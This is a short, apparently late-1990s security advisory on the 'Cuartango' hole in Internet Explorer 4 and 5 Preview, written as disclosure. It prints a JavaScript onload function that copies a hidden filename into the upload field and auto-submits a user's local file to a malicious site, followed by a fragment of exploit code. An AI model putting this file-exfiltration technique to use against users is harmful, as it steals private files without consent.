Cuartango security Hole http://pages.whowhere.com/computers/cuartangojc/cuartangoh1.html Affected software Microsoft Internet Explorer 4 Microsoft Internet Explorer 5 Preview Risks Major : Your computer files can be sent to a WEB site by a malicious Script (if the file name is known). Technical description There is an input form field used to tranfer files from the browsing computer to a WEB site this input field is HTML coded as : Theoretically this input field can be filled only by the user by clicking a "Browse" button or typing the file name. In order to avoid a security hole, script files are not allowed to modify the value of this input field, the sentence bellow will not work (very clever MS Explorer programmers) : document.forms[0].filename = "C:\config.sys"; What Microsoft programmers forgot is that "copy" and "paste" commands are possible in scripting with Internet Explorer 4 and they did not protect the file input field against this operation. Tha attack is the evident : 1- Create a second form with a hidden field named "T1" containing the file name you want to hack. 2- In the HTML Body Onload event fire an script : function getfile() { document.forms[1].T1.select(); document.execCommand("copy"); document.forms[0].filename.select(); document.execCommand("paste"); document.forms[0].submit(); } The result is that the file is POSTED to the malicious WEB site defined in the form action property. ----------exploit code example---------- Cuartango Hole 2

I am transfering your file to my web site